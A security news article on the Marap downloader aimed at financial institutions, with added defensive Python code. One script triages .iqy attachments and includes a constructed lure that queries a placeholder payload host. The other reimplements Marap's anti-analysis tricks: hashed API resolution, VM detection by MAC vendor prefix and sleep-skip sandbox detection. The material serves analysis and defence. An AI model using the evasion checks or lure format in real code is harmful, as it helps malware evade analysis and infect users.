
Security researchers have discovered a new strain of malware named Marap targeting financial sectors

Security researchers have discovered a new strain of malware named Marap that targets the financial sector. Researchers at Proofpoint discovered the malware and report that it is distributed through large spam email campaigns carrying malicious attachments (malspam). Marap is a downloader: its job is to fetch further modules and payloads onto the infected system.

“Proofpoint researchers recently discovered a new downloader malware in a fairly large campaign (millions of messages) primarily targeting financial institutions. The malware, dubbed “Marap” (“param” backward), is notable for its focused functionality that includes the ability to download other modules and payloads. The modular nature allows actors to add new capabilities as they become available or download additional modules post infection. To date, we have observed it download a system fingerprinting module that performs simple reconnaissance.”

Marap malware analysis

The spam emails pose as messages from a sales department, as an important document from a bank, or as an invoice, and carry one of several attachment types:
  • Microsoft Excel Web Query (“.iqy”) files
  • Password-protected ZIP archives containing “.iqy” files
  • PDF documents with embedded “.iqy” files
  • Microsoft Word documents containing macros
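All of the lures except the macro document rely on the same mechanism: an Excel Web Query (.iqy) file is plain text whose third line is a URL that Excel fetches when the file is opened. The triage helper below is an added example, not Proofpoint's tooling or anything from the Marap samples; it parses an .iqy, flags queries to hosts outside a hypothetical allowlist (ALLOWED_HOSTS), looks inside ZIP attachments for .iqy members, and reports password-protected members it cannot read. The sample attachments at the bottom are constructed for the demonstration and the hostnames are placeholders.

```python
"""Triage e-mail attachments for Excel Web Query (.iqy) lures.

Added example (not Proofpoint's code). An .iqy file is plain text:
line 1 is the literal "WEB", line 2 the format version ("1"), line 3 the
URL Excel will request when the file is opened; optional key=value
parameters follow. Fetching that URL is how the lure pulls the next stage.
"""
import io
import zipfile
from urllib.parse import urlparse

# Hypothetical allowlist of internal hosts whose web queries are expected.
ALLOWED_HOSTS = {"intranet.example.invalid"}


def parse_iqy(data: bytes) -> dict:
    """Parse an Excel Web Query file; raise ValueError if it is not one."""
    lines = [line.strip() for line in data.decode("utf-8", errors="replace").splitlines()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not an Excel Web Query file")
    params = {}
    for line in lines[3:]:
        if "=" in line:
            key, _, value = line.partition("=")
            params[key.strip()] = value.strip()
    return {"version": lines[1], "url": lines[2], "params": params}


def iqy_findings(name: str, data: bytes) -> list:
    """Return human-readable findings for one .iqy blob (empty list = nothing suspicious)."""
    try:
        query = parse_iqy(data)
    except ValueError as exc:
        return [f"{name}: {exc}"]
    url = urlparse(query["url"])
    host = (url.hostname or "").lower()
    if url.scheme in ("http", "https") and host not in ALLOWED_HOSTS:
        return [f"{name}: web query to external host {host} ({query['url']})"]
    if url.scheme not in ("http", "https"):
        return [f"{name}: unusual query scheme {url.scheme!r} ({query['url']})"]
    return []


def triage_attachment(name: str, data: bytes) -> list:
    """Inspect a bare .iqy or a ZIP that may contain one; return findings."""
    lowered = name.lower()
    if lowered.endswith(".iqy"):
        return iqy_findings(name, data)
    if lowered.endswith(".zip"):
        findings = []
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            for info in archive.infolist():
                if not info.filename.lower().endswith(".iqy"):
                    continue
                member = f"{name}!{info.filename}"
                if info.flag_bits & 0x1:  # bit 0 set = encrypted entry (password-protected ZIP)
                    findings.append(f"{member}: encrypted .iqy, cannot inspect; treat as suspicious")
                    continue
                findings.extend(iqy_findings(member, archive.read(info)))
        return findings
    return []


# Constructed samples, not real campaign artifacts; hostnames are placeholders.
LURE_IQY = b"WEB\r\n1\r\nhttp://payload.example.invalid/1.dat\r\n\r\nSelection=All\r\nFormatting=None\r\n"
BENIGN_IQY = b"WEB\r\n1\r\nhttps://intranet.example.invalid/sales.xml\r\n"


def build_zip_with_iqy(iqy: bytes, member_name: str = "invoice.iqy") -> bytes:
    """Wrap an .iqy in an (unencrypted) in-memory ZIP, as the ZIP lure variant does."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr(member_name, iqy)
    return buf.getvalue()


if __name__ == "__main__":
    for attachment, blob in [
        ("Invoice_2018.iqy", LURE_IQY),
        ("sales_report.iqy", BENIGN_IQY),
        ("documents.zip", build_zip_with_iqy(LURE_IQY)),
    ]:
        for finding in triage_attachment(attachment, blob) or [f"{attachment}: no findings"]:
            print(finding)
```

A password-protected ZIP cannot be opened by the gateway, which is the point of that variant; the helper therefore reports the encrypted member rather than silently passing it. The PDF-with-embedded-.iqy variant needs a PDF attachment extractor in front of this function, which is outside the scope of the example.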
The Marap malware is named after its command-and-control phone-home parameter, “param” spelled backward. It is written in C and includes several anti-analysis features:
  1. Most Windows API functions are resolved at runtime by hash rather than by name, so the import table reveals little about what the sample does. Hash-based resolution is common in malware, but Marap's hashing algorithm appears to be custom, so the precomputed hash tables analysts keep for the usual algorithms do not apply to it.
  2. Timing checks run at the beginning of important functions to detect debuggers and sandboxes. The malware exits if the measured time is too short, the pattern produced by a sandbox that fast-forwards sleep calls.
  3. The malware compares the system's MAC address against a list of virtual-machine vendor prefixes, and if a virtual machine is detected and a configuration flag is set, the malware may exit.
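The three checks above as analyst-side helpers, written here as an added example and not taken from Marap. Because the page does not publish Marap's custom hash, the classic ror13 export-name hash stands in for it; the hash-table approach is what an analyst builds to label hashed calls either way. The hypervisor OUI list is the usual set of vendor MAC prefixes, and the timing check takes its sleep and clock functions as parameters so a sleep-skipping sandbox can be simulated offline. MAC addresses in the demo are constructed.

```python
"""Marap-style anti-analysis checks, as analyst helpers (added example, not Marap's code).

  1. API names resolved by hash at runtime: ror13 is used as a stand-in
     for Marap's unpublished custom hash; the table-building is the same.
  2. Timing check around a sleep: a sandbox that fast-forwards Sleep()
     returns too early and the sample exits.
  3. MAC-address check against hypervisor OUIs, gated by a config flag.
"""
import time
from typing import Callable, Optional


def ror13_hash(name: str) -> int:
    """Classic 32-bit ror13 hash of an export name (stand-in for Marap's custom hash)."""
    h = 0
    for byte in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + byte) & 0xFFFFFFFF
    return h


def build_hash_table(export_names) -> dict:
    """Precompute hash -> name, as an analyst does to label hashed API calls."""
    return {ror13_hash(name): name for name in export_names}


def resolve_api_hash(wanted: int, table: dict) -> Optional[str]:
    """Mirror of the malware's resolver: look the function up by hash, not by name."""
    return table.get(wanted)


# Hypervisor OUIs (first three octets) that VM-detection code commonly checks.
VM_VENDOR_OUIS = {
    "00:05:69": "VMware", "00:0C:29": "VMware", "00:1C:14": "VMware", "00:50:56": "VMware",
    "08:00:27": "VirtualBox",
    "00:15:5D": "Hyper-V",
    "00:16:3E": "Xen",
    "00:1C:42": "Parallels",
    "52:54:00": "QEMU/KVM",
}


def normalize_mac(mac: str) -> str:
    """Accept 00-0c-29-.., 000c29.., or 00:0C:29:.. and return AA:BB:CC:DD:EE:FF."""
    digits = "".join(c for c in mac if c in "0123456789abcdefABCDEF").upper()
    if len(digits) != 12:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def vm_vendor_for_mac(mac: str) -> Optional[str]:
    """Return the hypervisor vendor if the OUI is in the list, else None."""
    return VM_VENDOR_OUIS.get(normalize_mac(mac)[:8])


def sleep_was_skipped(sleep_ms: float,
                      sleep_fn: Callable[[float], None] = time.sleep,
                      clock: Callable[[], float] = time.perf_counter,
                      tolerance: float = 0.5) -> bool:
    """True when the sleep returns in less than `tolerance` of the requested time."""
    start = clock()
    sleep_fn(sleep_ms / 1000.0)
    elapsed_ms = (clock() - start) * 1000.0
    return elapsed_ms < sleep_ms * tolerance


def analysis_environment_suspected(mac: str, exit_on_vm: bool, sleep_ms: float = 50,
                                   sleep_fn=time.sleep, clock=time.perf_counter) -> Optional[str]:
    """Combine the checks as the write-up describes; return the reason to exit, or None."""
    if sleep_was_skipped(sleep_ms, sleep_fn, clock):
        return "sleep returned early: sandbox or debugger suspected"
    vendor = vm_vendor_for_mac(mac)
    if vendor and exit_on_vm:  # the VM check only bites when the config flag is set
        return f"MAC OUI belongs to {vendor}: virtual machine detected"
    return None


if __name__ == "__main__":
    table = build_hash_table(["LoadLibraryA", "GetProcAddress", "WinHttpOpen"])
    wanted = ror13_hash("LoadLibraryA")
    print(hex(wanted), "->", resolve_api_hash(wanted, table))
    # Constructed MAC with a VMware OUI; the host part is arbitrary.
    print(analysis_environment_suspected("00:0C:29:12:34:56", exit_on_vm=True))
    print(analysis_environment_suspected("00:0C:29:12:34:56", exit_on_vm=False))
```

For a sample whose hash is custom, the table-building step is the part that changes: once the algorithm is lifted from the binary, the same loop over export names (kernel32, winhttp and so on) recovers the call targets.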
The malware uses HTTP to communicate with its C&C, but first calls a number of legitimate WinHTTP functions to determine whether a proxy is required and, if so, which one to use. According to the researchers, Marap shares many features with previous campaigns run by the threat actor group TA505.